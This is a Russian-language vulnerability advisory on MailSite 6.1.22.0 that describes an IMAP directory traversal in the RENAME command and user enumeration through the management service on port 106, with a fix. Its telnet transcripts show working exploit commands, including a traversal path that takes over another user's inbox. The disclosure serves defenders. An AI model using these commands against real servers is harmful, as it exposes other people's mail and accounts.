Обход каталога в службе IMAP в MailSite

Дата публикации:
06.01.2006
Всего просмотров:
2382
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-0130
CVE-2006-0127
CVE-2006-0129
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MailSite 6.x
Уязвимые версии: MailSite 6.1.22.0, возможно более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю получить доступ к потенциально важным данным на системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах команды RENAME. Удаленный пользователь может с помощью символов обхода каталога просмотреть письма других пользователей на системе. Пример:

 
	josh at lab1:~$ telnet 10.0.0.5 143
	Trying 10.0.0.5...
	Connected to 10.0.0.5.
	Escape character is '^]'.
	* OK  MailSite IMAP4 Server 6.1.22.0 ready
	a1 login joe pass
	a1 OK LOGIN completed
	a2 rename ../../josh/INBOX gotcha
	a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
	a3 select gotcha
	* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
	* 0 EXISTS
	* 0 RECENT
	* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
	* OK [UNSEEN 0]
	* OK [UIDVALIDITY 514563061] UIDs are valid
	a3 OK [READ-WRITE] opened gotcha

Удаленный пользователь может определить наличие учетной записи на системе с помощью Management Server (106/tcp). Пример:

 
	josh at maoz:~$ telnet 10.0.0.6 106
	Trying 10.0.0.6...
	Connected to 10.0.0.6 (10.0.0.6).
	Escape character is '^]'.
	200 Ok, "MailSite Mail Management Server (7.0.3.1) ready" 
	user IDoNotExist
	510 "Error 2 in OpenMailbox, The system cannot find the file specified. "
	user postmaster
	200 Ok, "send password"

URL производителя: www.rockliffe.com/products/mailsite-email-server-software.asp

Решение: Установите последнюю версию (6.1.22.1) с сайта производителя.

Источники:

Ссылки: Rockliffe's Mailsite Mail Management Server User Enumeration Flaw
Rockliffe's Mailsite Imap Directory Transversal Vulnerability

или введите имя

CAPTCHA